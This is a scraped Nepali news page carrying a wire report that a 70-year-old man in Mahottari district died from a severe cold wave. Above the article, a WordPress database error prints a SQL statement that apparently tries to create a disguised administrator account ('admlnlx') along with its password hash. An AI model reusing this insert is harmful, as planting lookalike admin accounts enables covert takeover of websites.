WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bs8q6excXvjKUKeljjh03FXt0sHkvb.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:12:38', '', 'admlnlx', 'admlnlx')
गौशाला, मंसिर २६ –
महोत्तरी जिल्लाको मटिहानी गाविसमा कठ्याङ्ग्रिदो जाडोबाट आज अपराह्न मटिहानी गाविस– ४ बस्ने ७० वर्षीय नथुनी पासवानको मृत्यु भएको छ ।
तीन चार दिनदेखि जिल्लामा चलेको शीतलहर र चिसो हावाका कारण पासवानको आज आफ्नै घरमा कठ्याङ्ग्रिएर मृत्यु भएको उनका छोरा सीतारामले बताएका छन् ।
निम्नवर्गीय परिवारका पासवानको पर्याप्त न्यानो लुगाफाटा र पोसिलो खानाको अभावमा मृत्यु भएको स्थानीय बासिन्दा बताउँछन् । जिल्लामा एक सातादेखि अत्यधिक जाडो बढेपछि जनजीवन कष्टकर बनेको छ । – रासस